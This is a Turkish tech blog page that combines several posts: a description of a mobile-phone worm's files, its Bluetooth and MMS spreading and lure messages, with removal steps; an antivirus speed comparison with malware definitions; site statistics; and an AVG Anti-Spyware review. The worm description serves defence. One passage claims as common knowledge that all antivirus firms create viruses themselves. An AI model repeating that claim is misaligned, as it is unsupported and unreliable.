Install
Sexoo-Chattz

Aha sex hemen atlar millet zaten bir yes daha yaparsanız …

  • [Drive]\system\apps\UltraPlayer\ultraplayer.exe
  • [Drive]\system\apps\UltraPlayer\inition.mdl

Bu dosyaları yukarıdaki gördüğünüz klasörlere oluşturuyor. Yani sisteminize kendini gömüyor..

  • e:\system\recogs\inition.mdl
  • e:\system\wmedias\inition.mdl
  • e:\system\wmedias\ultraplayer.exe

Bu dosyalarıda Hafıza kartınıza kopyalıyor. Tabi iş burada bitmiyor..

Her dakika boyunca bluetooth ile diğer cep telefonlarını arıyor bulduğuna kendini gönderiyor..

Dahası da var..

e:\system\wmedias\Codec.sis

bu dosyayı oluşturup sisteminizde farklı isimlerle yukarıda belirttiğim gibi

7ctmzslu.sis
i34pabg1ar4.sis
jgh6rglu.sis

bu tip saçma isimlerle gönderiyor sadece bluetooth dan gönderse gene iyi en fazla pilinizi yer bitirir ama malesef … Sizin telefon rehberinizdeki herkeze bir güzel MMS mesajı atmaya başlıyor…

yine sis uzantılı bu dosyayı yani kendi kopyasını MMS mesajına ekleyip telefon rehberinizdeki arkadaşlara

Başlık: Ahmet Hüseyin
Mesaj: Bu mesajı kesin okuman lazım!

Başlık: Selim Ağa
Mesaj: Sana kendimi gönderdim!

başlık: Naber !!
Mesaj: Sex yapmak ister misim ?

gibi mesaj başlıkları ile dosyayı gönderiyor. Telefon rehberinizdeki herkez olmasada büyük çoğunluk bu meajları kabul edecek daha sonrada onada virüs bulaşmış olacaktır. Aman dikkat

Siz siz olun…

  • Bluetooth açık kalmasın
  • Dosya transferinde şifre kullanın
  • Bilmediğiniz kişilerden gelen dosya transferlerini kabul etmeyin
  • MMS mesajlarına dikkat edin.

Peki bu virüsü nasıl sileceğiz ?

Aslında basit… Birkaç dosyayı silerek kurtulabilirsiniz…

  • [Drive]\system\apps\UltraPlayer\ultraplayer.exe
  • [Drive]\system\apps\UltraPlayer\inition.mdl

Bu dosyaları siliniz. Bu dosyalar telefon hafızanızda yer almakta bu dosyaları sildikten sonra HAFIZA KARTINIZA bulaşmış olan

  • e:\system\recogs\inition.mdl
  • e:\system\wmedias\inition.mdl
  • e:\system\wmedias\ultraplayer.exe
  • e:\system\wmedias\Codec.sis

Dosyalarıda tek tek silmeniz gerekmekte eğer çok önemli bir bilginiz yoksa hafıza kartınıza format atmanızı öneririm.

Sonrada telefonunuzu KAPATIN / TEKRAR AÇIN …

İşlem bitmiştir…

Ben bunları yapamam daha başka yolu yokmu diyorsanız..

1. Telefonunuzdan Wap bölümünü açabilirsiniz.

2. http://mobile.f-secure.com adresine giriniz.

3. Download F-Secure basarak telefonunuza Anti-Virüs programını indiriniz.

4. F-Secure telefonunuza indikten sonra Programı kurunuz.

5. Programlar menüsünden Anti-Virüs programını çalıştırınız.

6. Anti-virüs programı ile tarama yapınız.

7. Virüsleri bulduktan sonra bir güzel temizler sonrada telefonunuzu kapatıp açınız.

Kaynaklar : F-Secure ve Symantec

Scrnsave.scr nedir ?

Pazartesi, Mart 24th, 2008

2003 Server kullanıyorsanız ve görev yöneticisinde Scrnsave.src isminde bir program gördüyseniz merak etmeyin. Bir virüs yada trojan DEĞİL normal bir servis. Kısacası ekran koruyucusu 2003 Server’in ekran koruyucusu. :) Bugün başıma geldi de trojana benzer bir ismi var save.exe gibi . Sizde biran şüphelenirsiniz diye sizlerle paylaşmak istedim.

Paylaşırız Biz Antivirüs Performans 2007 Testi

Pazar, Ağustos 5th, 2007

WhitePostMaN |

Evet arkadaşlar gelişen teknoloji ile doğrusal olarak gelişen virüs ve güvenlik tehditlerinin tabiki önlemi antivirüs ve diğer güvenlik yazılımları peki almış olduğumuz yazılım gerçekden de işe yarıyormu yoksa sadece popüler ismi duyulmuş fakat görğnürde pek bi iş yapamaz bir programdan mı ibaret bu sorularınızın yanıtını bu yazımızda mümkün olduğunca cevaplamaya çalışacağız.
İlk olarak kısaca bilgisayar virüsü, solucan truva atı ve diğerleri hakkında bir bilgi verelim nedir.

Virüs nedir?
Virüs, kendini bir programa veya bir dosyaya iliştirerek bilgisayardan bilgisayara atlayabilen bir bilgisayar kodu parçasıdır. Yeni bilgisayarlara atladıkça bulaşır. Virüsler yazılımınıza, donanımınıza ve dosyalarınıza hasar verebilir.

Virüs (i.) Kendi kendini çoğaltması amacıyla yazılmış kod. Bir virüs, kendisini taşıyıcı bir programa iliştirir ve ardından bilgisayardan bilgisayara yayılmaya çalışır. Donanıma, yazılıma veya bilgilere zarar verebilir.

İnsanları etkilen virüslerin Ebola’dan 24-saatlik gribe kadar etki derecesi değiştiği gibi, bilgisayar virüsleri biraz rahatsız edici olanlardan tümden tahrip edici olanlara kadar çeşitlilik gösterir. İşin iyi yanı, gerçek bir virüs, insan eylemi olmaksızın yayılmaz. Virüsü yaymak birinin bir dosyayı paylaşması veya bir e-posta göndermesi gerekir.
Sayfanın başına gitSayfanın başına git
Solucan nedir?

Solucan da, virüs gibi, kendisini bir bilgisayardan diğerine kopyalamak için tasarlanmıştır ancak bunu otomatik olarak yapar. İlk olarak, bilgisayarda dosya veya bilgi ileten özelliklerin denetimini ele geçirir. Solucan bir kez sisteminize girdikten sonra kendi başına ilerleyebilir. Solucanların en büyük tehlikesi, kendilerini büyük sayılarda çoğaltma becerileridir. Örneğin bir solucan, e-posta adres defterinizdeki herkese kopyalarını gönderebilir ve sonra aynı şeyi onların bilgisayarları da yapabilir. Bu, domino etkisinin getirdiği yoğun ağ trafiği işyeri ağlarını ve Internet’in tümünü yavaşlatabilir. Yeni solucanlar ilk ortaya çıktıklarında çok hızlı yayılırlar. Ağları kilitlerler ve olasılıkla sizin ve başkalarının Internet’teki Web sayfalarını görüntülerken uzun süreler beklemenize yol açarlar.

Solucan (i.) Virüslerin bir alt sınıfıdır. Bir solucan genellikle kullanıcı eylemi olmaksızın yayılır ve kendisinin tam kopyalarını (olasılıkla değiştirilmiş) ağlardan ağlara dağıtır. Bir solucan bellek veya ağ bant genişliği tüketebilir, bu da bilgisayarın çökmesine yol açabilir.

Solucanlar yayılmak için bir “taşıyıcı” programa veya dosyaya gereksinim duymadıklarından, sisteminizde bir tünel de açabilir ve başka birinin uzaktan bilgisayarınızın denetimini eline geçirmesini sağlayabilir. Yakın geçmişteki solucanlara örnek olarak Sasser solucanı ve Blaster solucanı verilebilir.
Sayfanın başına gitSayfanın başına git
Truva atı nedir?

Mitolojideki Truva atı nasıl bir armağan gibi görünüp, aslında Troya kentini ele geçirecek Yunanlı askerleri taşıyorduysa; bugünün Truva atları da yararlı yazılımlar gibi görünen bilgisayar programlarıdır, ancak güvenliğinizi tehlikeye atar ve pek çok zarara yol açarlar. Yakın geçmişteki bir Truva atı, Microsoft güvenlik güncelleştirmeleri olduğu iddia edilen eklerin bulunduğu bir e-posta görünümündeydi, ancak ekteki dosyaların virüsten koruma ve güvenlik duvarı yazılımlarını devreden çıkarmayı hedefleyen virüsler olduğu ortaya çıktı.

Truva atı (i.) Yararlı gibi görünen ancak aslında zarara yol açan bir bilgisayar programı.

Truva atları, insanların, meşru bir kaynaktan geldiğini düşündükleri bir programı açmaya yöneltilmeleri yoluyla yayılır. Kullanıcıları daha iyi korumak için Microsoft e-posta aracılığıyla güvenlik bültenleri gönderir; ancak bunlarda hiçbir zaman ek bulunmaz. Ayrıca, müşterilerimize e-posta ile gönderilmeden önce tüm güvenlik uyarılarımız Güvenlik Web sitemizde yayımlanır.

Truva atları, ücretsiz olarak yüklediğiniz yazılımlarda da bulunabilir. Güvenmediğiniz bir kaynaktan asla yazılım yüklemeyin. Microsoft güncelleştirmelerini ve düzeltme eklerini her zaman Microsoft Windows Update veya Microsoft Office Update’ten yükleyin.
Sayfanın başına gitSayfanın başına git
Solucanlar ve diğer virüsler nasıl yayılır?

Hemen tüm virüsler ve pek çok solucan, bulaştıkları bir programı açmadığınız veya çalıştırmadığınız sürece yayılamaz.

En tehlikeli virüslerin birçoğu temel olarak e-posta ekleri (bir e-posta iletisiyle gönderilen dosyalar) yoluyla yayılmıştır. E-postanızın bir ek içerip içermediğini genellikle anlayabilirsiniz, çünkü size eki ve adını temsil eden bir ataç simgesi ile gösterilir. Fotoğraflar, Microsoft Word ile yazılmış mektuplar ve hatta Excel elektronik tabloları, e-posta ile her gün alıyor olabileceğiniz dosya türlerinden bazılarıdır. Bir virüs, bulaştığı dosya ekini açtığınızda harekete geçer (bir eki açmak için genellikle ek simgesini çift tıklatırsınız).
İpucu

İpucu: Eki bekliyor ve ekteki dosyanın tam olarak içeriğini biliyor olmadıkça bir e-postanın ekindeki herhangi bir şeyi açmayın.

Tanımadığınız birinden eki olan bir e-posta alırsanız hemen silin. Ne yazık ki, bazen tanıdığınız kişilerden gelen ekleri açmak da güvenli değildir. Virüs ve solucanların, e-posta programlarından bilgi çalma ve kendilerini adres defterinde listelenen herkese gönderme becerileri vardır. Dolayısıyla, birinden anlamadığınız bir ileti veya beklemediğiniz bir dosya içeren bir e-posta alırsanız, eki açmadan önce her zaman bu kişiyle bağlantıya geçin ve ekin içeriğini doğrulatın.

Diğer virüsler Internet’ten yüklediğiniz programlar, arkadaşlarınızdan ödünç aldığınız virüslü bilgisayar diskleri veya bir mağazadan satın aldığınız programlar yoluyla yayılabilir. Bunlar, virüs kapmanın az rastlanan yollarıdır. Çoğu kişi, bilinmeyen e-posta eklerini açıp çalıştırdıklarında virüs kapar.
Sayfanın başına gitSayfanın başına git
Bilgisayarımda bir solucan veya başka bir virüs olup olmadığını nasıl saptayabilirim?

Virüslü bir programı açıp çalıştırdığınızda, bir virüs kaptığınızı anlamayabilirsiniz. Bilgisayarınız yavaşlayabilir veya birkaç dakikada bir kilitlenip yeniden başlayabilir. Bazen bir virüs bilgisayarı başlatmak için gereken dosyalara saldırır. Bu durumda, güç düğmesine bastığınızda karşınızda boş bir ekran görebilirsiniz.

Tüm bu belirtiler bilgisayarınızda bir virüs bulunduğuna dair sık rastlanan işaretlerdir; yine de bazen virüsle hiç ilgisi olmayan donanım veya yazılım sorunlarının yol açtığı şeyler olabilir.

Virüs içeren bir e-posta gönderdiğinizi bildiren iletilere dikkat edin. Bu, virüsün, kendi oluşturduğu e-postanın göndereni olarak sizin e-posta adresinizi gösterdiği anlamına gelebilir. Bilgisayarınızda virüs olduğu anlamına gelmez. Bazı virüslerin sahte e-posta adresi üretme becerisi vardır.

Bilgisayarınızda güncel bir virüsten koruma yazılımı yoksa, bir virüs bulaşıp bulaşmadığını anlamanın güvenilir bir yolu yoktur. Güncel bir virüsten koruma yazılımınız yoksa veya farklı bir üreticinin virüsten koruma yazılımını yüklemek istiyorsanız, Güvenlik yazılımı yüklemeleri sayfamızı ziyaret edin.
Sayfanın başına gitSayfanın başına git
Sonraki adımlar: Virüs riskini azaltmak

Hiç bir şey bilgisayarınızın güvenliğini %100 garanti edemez. Ancak, yazılımınızın güncel kalmasını sağlayarak ve güncel bir virüsten koruma yazılımı aboneliği edinerek, bilgisayarınızın güvenliğini geliştirmeyi sürdürebilirsiniz.

Peki bu Virüsler Nasıl Meydana Geliyor

1- Probaganda reklam amaçlı Yazılan virüsler

Bu kategorideki virüs yazarları ezilmiş akıllı insanlar topluluğuda denilebilir fakat ya emeklerinin karşılığını yeterince alamadıklarından yada gerçekden onların kişisel olarak bastırılmış duygularını serbest bırakacak başka bir yol bulamamalarından seslerini duyurmanın ve eziklikden kurtulmanın bir seçeneğide denilebilir.

Aynı olayı hackerlarda web sitelerini çökerterek yaparlar.

2- Ticari Amaç Önce yaparım sonra temizlerim Çıkar Amaçlı Virüs Yazmak

O kadar bilgim var ve bu bilgimi neden kötüye kullanayım ha eğer parası iyiyise neden olmasın kulllanırım tabiki maksat çıkar değilmi eksi sözlükden bir kaç satır la şı çıkarı bir özetleyelim

Yani özlü sözü açıklarsak Zaten test ettiimiz bu antivirüs firmalarının bilindiği gibi arka tarafı yani bizim bilmediğimiz ticaretde bir çok firmanın kurduğu karapara haklama top secret birimlerinin çalışmaları diyebiliriz. Tüm antivirüs firmalarının önce virüsü yapıp sonrada bunu temizlemesi zaten herkesin bildiği bir olay adamlar yoksa böyle bir sektörü nasıl oluşturacaklarişi biliyorlar önce gerekli ortam oluşturuluyor sonrada arz ve talep dengeleri yaratılıyor.

Neyse bu kadar açıklamadan sonra artık gerçek işimize dönelim Cnet in yaptığı test karşınızda.

Paylaşırız.biz araştırmalrı sonucu cnet editörlerinin testi ile karşınızdayız
Karspersky zirvede göreceğiniz test de Norton son yıllarda sürekli eziliyordu bu son test de norton 360 olayı tutmuş gibi bi nebze olayı ilerletmiş adamlar 2006 da listelere bile giremezken şu anda en iyiler arasına girdi Mcaffe 2007 yılında bir de güvenlik duvarını bünyesine katmış olduğu halde yine başarısız nod32 yi de yabana atmamak gerek çok iyi sonuçlar elde etti BitDefender-10 ise güvenlik duvarından top geçer adam geçmez misali fakat temizlemelerdeki performası yerine daha çok virüsleri engellemeye çalışıyor son olarak trend micro her zamanki gibi listelerin başında performasnsı ve zararlıyı etkisiz hale getirmesindeki başarısı ile göz dolduruyor.

 

iTunes 6 deep-scanning Performans
(kısa süre yüksek performası gösterir)

iTunes 6  

 

Test system

162

Kaspersky Anti-Virus 6

174

NOD32 2.5

194

McAfee VirusScan Plus 2007

196

CA Anti-Virus 2007

206

Norton AntiVirus 2007

208

BitDefender 10

234

AVG AV Pro 7.5

296

 

Sorenson Squeeze 4 deep-scanning peformas

Sorenson Squeeze 4  

 

Test system

241

Kaspersky Anti-Virus 6

250

NOD32 2.5

283

Norton AntiVirus 2007

317

McAfee VirusScan Plus 2007

329

AVG AV Pro 7.5

334

CA Anti-Virus 2007

335

BitDefender 10

348

 

Tarama Hızı
(kısa süre yüksek performası gösterir)

Kaspersky Anti-Virus 6

Kaspersky Anti-Virus 6 Editors' Choice
Kaspersky Anti-Virus 6 hızlı ve tutarlı bir şekilde zararlıları bulmada gerçekden en iyi seçim oldu ruslar bu işi biliyor.

8.0 out of 10
CNET editor’s take
Check prices

Alıntıdır : WhitePostMaN Paylasiriz.biz

1 Yılı Devirdik Sonunda..

Çarşamba, Temmuz 18th, 2007

Bu gece internet sayfam TEAkolik.Com ‘un doğum günü diyebilirim. Gerçi 3 senedir Blog yazıyorum daha önceden info olarak domainim vardı. Sonra DB ‘yi kaybetmem felan falan silbaştan başlamama neden olmuştu. 2 Yıllık emek felan gitmişti. Şimdi ise Blog acemiliğimi tam olarak üzerimden attım diyebilirim. Aslında 3 yıl oldu Blogger olarak devam ediyorum.

Peki neler oldu.. ?

Google Pagerank ‘ım 1 Yıl içerisinde 4 oldu.

Dmoz.Org beni bu 1 yıl içerisinde kabul etti.

413 tane yazı yazdım.

1696 farklı kişi yorum gönderdi

3,757 tane toplam yorum gönderildi.

Üyelik Zorunlu değil ve hatta kimsenin gözüne çarpmasın diye üstte sağ tarafa KAYIT OL linki koydum
421 kişi Bloguma üye oldu.

En çok okunan Driver istek makalem 1280 yorumla en başa yükseldi.

Son zamanlarda Aylık 70.245 tekil ip ziyaretiyle tepeye doğru yükselmeye devam ediyorum.

Ortalama 1.73 Pages/Visit ile göz doldurmaya başladım diyebilirim.

Ortalama kişi başına 1:18 dakika ile ziyaretçilerimi sitemde tutabiliyorum.

Türkçe yayın yapmama rağmen aşağıdaki gibi bir istatistik oluştu.

tr : 60,014
en-us : 4,467
es : 280
pt-br : 240
tr-tr : 189
pl : 181

ingilizce’mi geliştiremedim doğru dürüst…

Her ay 10,512 sürekli okuyucuya sahip oldum.

240 farklı internet safasında yazılarım yayınlandı ve link verildi.

Google bana aylık ortalama 60.000 kişi göndermeye başladı.

En çok yorum yazan arkadaşlar…

  1. murat (45 yorum)
  2. mustafa (35 yorum)
  3. mehmet (34 yorum)
  4. ahmet (28 yorum)
  5. ALi (26 yorum)
  6. hakan (24 yorum)
  7. Nil_Lin (24 yorum)
  8. hasan (21 yorum)
  9. fatih (21 yorum)
  10. Serkan (21 yorum)

Kişileri en çok yorum yapan arkadaşlar….
…bol bol teşekkür ederim.

AVG Anti-Spyware 7.5 Test

Cuma, Temmuz 6th, 2007

Merhaba arkadaşlar bu gece sistemime bulaşan tojanlardan (Kardeşim saolsun) kurtulmak için kullandığım Anti_spyware programını bir kenara attım ve AVG firmasının Anti-Spyware programını kurdum sizlerlede bu programın testini paylaşmak istedim.

Program 30 günlük deneme sürümü olarak AVG İnternet sayfasından indirebilirsiniz. Programımızı indirdikten sonra sistemimize Setup dosyasını çalıştırarak kuruyoruz

Programı kurduktan sonra sistem saatinin yanına AVG Anti-Spyware kendini RENKLİ simge olarak yerleştiriyor.

Kurulum bittikten sonra ilk yapmanız gereken güncelleme kontrol etmek.

Programımızın ara yüzünde STATUS sekmesi altında LAST UPDATE bölümünden UPDATE NOW bölümünü tıklayarak güncellemelerimizi alıyoruz.

avg1.JPG

Yada isterseniz UPDATE sekmesinden UPDATE NOW butonuna basarak güncellemeleri çekebilir kontrol edebilirsiniz.

avg2.JPG

Güncellemelerimizi aldıktan sonra sistemimizi tarıyoruz. Sisteminize 2. olarak yapmanız gereken ise Komple sistem taraması yapmaktır. Bunun için yine STATUS bölümünden SCAN NOW bölümünü tıklayarak sistem taramasını başlatmaktır.

avg3.JPG

Sisteme bulaşan trojanların vay geldi haline… Tıkır tıkır işlemeye başladı. Açıkca söylemek gerekirse birçok Anti-Spy programından daha hızlı ve daha aktif çalıştığını söyleyebilirim. Özelliklede sistem taramasınnın komple sistem test yapmama ragmen çok fazla kasmadan idare edebilmesi dikkatimi çekti.

Evet programımızı tanımaya başladık bile…

Öncelikle ;

STATUS Sekmesi

Bu bölümde programın çalışmasını aktifliğini , güncelliğini direkt kısa bir raporla karşımızda görebilmekteyiz. Bu bölümde sağ tarafranda lisans bilgileriniz yer almakta.

UPDATE Sekmesi ;

Bu kısımda ise güncellemelerinizi alabileceğiniz ve güncelleme kontrol süresini yapabileceğiniz ayar ekranı mevcut bunun dışında sağ tarafında ise eğer proxy vb. bir sistemle internete çıkıyorsanız SOCKS ve Proxy ayarlarınızı basit vekolayca yapabilmenizi sağlıyor.

SCANNER Sekmesi ;

Bu bölümde tarama yapabiliyoruz. İsterseniz Komple sistem taraması isterseniz hızlı tarama seçenekleri ile kolay kullanımı dikkat çekiyor diyebilirim. Ayrıca Regedit taraması RAM taraması ve özel tarama işlemleride bu sürümde mevcut…

avg4.JPG

Settings kısmına geldiğinizde tarma işleminin özel ayarlarını yapabilirsiniz. Varsayılan değerlerinde CAB, Zip gibi dosyaları açarak içlerindeki dosyalarıda tarama yaptığını görebilmekteyiz.

Bunun dışında birçok dosya formatı desteği ve bu formatları özel olarak kontrol etmesi hoşuma gitti diyebilirim.

Adware, tracking, cookie, riskware ve dialers tarması standar konumda bu kutuları boşaltmamanızı öneririm. :)

Scheduler sekmesinde ise özel olarak sistem taramasını belirli saat ve zamanlarda otomatik olarak yapabilmesini ayarlayabilmekteyiz.

Shielt bölümüne gelecek olursak burada yine Self protection , Files, Memory ve Cookie tarama işlemleri mevcut bu kutular standart olarak işaretli geliyor bilmiyorsanız uğraşmayın varsayılan olarak kalması en iyisi…

Infections bölümünde ise sisteminize bulaşmış olan Spy, adware gibi zararlı ürünleri görebilmekteyiz. Yani karantina bölümü diyebiliriz.

Reports bölümünde raporlamaları görebiliriz. Uzman kullanıcılar için bu raporlama ekranını unutmamışlar.

Gelelim ANALYSIS bölümüne burası ilgimi çekti diyebilirim. Birçok anti-virüs programında olmayan birkaç özellik eklenmiş durumda.

Processes sekmesi ;

Bu kısımda bilgisayarınızda çalışan program ve servisleri ayrıntılı olarak görebilmektesiniz. Programın aktif olup olmadığını internete çıkış yapıp yapmadığını ve PID numarasını görebilmekteyiz. Böylelikle programların kontrolünü ele alarak istemediğiniz programların internet çıkışlarını yasaklayabilirsiniz. Tabi bir firewall’ınız varsa istemediklerinize direkt dur diyebilirsiniz.

Connections sekmesi ;

Bu sekmede internete çıkış yapan programların hangi ip adresine gittiklerini ve hangi portu kullandığını görebiliyorsunuz. Gerçektende harika bir özellik.

AutoStarts sekmesi ;

Bu bölümde ise bilgisayarınız açıldığında otomatik olarak çalışan programların bir listesi mevcut bilgisayarınızı açtığınızda çalışmasını istemediğiniz ve kendiniz kumanda etmek isterseniz. Bu listedeki programları ve dosyaları bilgisayar açılışından kaldırabilmektesiniz.

TOOLS bölümüne gelelim bu bölümde ise Windows Hata raporu servisi office hata raporu servisi internet explorer ve media player gibi programların hata uyarı servislerini devre dışı bırakabilmenizi sağlayan seçenekler mevcut..

SONUÇ ;

Kullanımı kolay basit ve rahat ayrıca 30 günlük bedava sürümü ile sisteminizde deneme yapabilmektesiniz. Bunun dışında %90 verimle çalışan bir program sistemime bulaştırdığım tüm malware, spy, ve bu tip zararlı programları anında buldu ve temizlik yaptı. Ayrıca kendini sürekli güncellemesi dikkat çekici diyebilirim bence en önemlisi sürekli güncelleme alınabilmesidir. Böylelikle yeni çıkan zararlı programlara karşı korumanız sürekli mevcut…

AVG Anti SpyWare 7.5 İndir

(more…)